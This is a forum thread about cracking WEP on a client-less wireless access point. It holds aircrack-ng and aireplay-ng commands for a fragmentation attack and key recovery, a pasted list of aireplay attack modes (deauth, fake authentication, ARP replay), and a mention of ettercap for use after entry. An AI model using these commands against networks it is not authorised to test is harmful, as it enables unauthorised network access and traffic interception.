Guys,

Is there a guide to crack wep on a AP with no clients?

John.

Guys,

Is there a guide to crack wep on a AP with no clients?

John.
Yes. Search for clientless WEP cracking.

tazforum.thetazzone.com/viewtopic.php?t=6611

my tutorial, hope it helps, pass it on if you like it.

tazforum.thetazzone.com/viewtopic.php?t=6611

my tutorial, hope it helps, pass it on if you like it.

Nice tut...just read it...but one of the last things you wrote was "$ aircrack-ng -n 64 -b $AP *.ivs

**note, if its 128 bit, change 64 to 128**

how do you know if its 64 or 128 bit encryption?? I assumed you couldnt tell

Nice tut...just read it...but one of the last things you wrote was "$ aircrack-ng -n 64 -b $AP *.ivs

**note, if its 128 bit, change 64 to 128**

how do you know if its 64 or 128 bit encryption?? I assumed you couldnt tell
If you don't know, leave out the -n option. It will default to 128 which is most likely.

when i input aireplay-ng -5 -b 00:40:**:**:00:** -h 00:**:02:**:ac:f8 all I get is a bunch of options , does this mean my card is not supported??
filter options:

-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit

replay options:

-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-e essid : fakeauth attack : set target AP SSID
-j : arpreplay attack : inject FromDS pkts
-g value : change ring buffer size (default: 8)
-k IP : set destination IP in fragments
-l IP : set source IP in fragments
-o npckts : number of packets per burst (-1)
-q sec : seconds between keep-alives (-1)
-y prga : keystream for shared key auth

source options:

-i iface : capture packets from this interface
-r file : extract packets from this pcap file

attack modes (Numbers can still be used):

--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)

This works great. I never put in ath1 after aireplay-ng -5 -b 00:40:**:**:00:** -h 00:**:02:**:ac:f8.

Great tutorial keep up the good work.

when i input....all I get is a bunch of options...
In almost any program, this is a good indication that you gooned up something on the command line, as you already figured out.

Thanks guys.
I have 2 ettercap tutorials on the site as well, that you could use after cracking the WEP.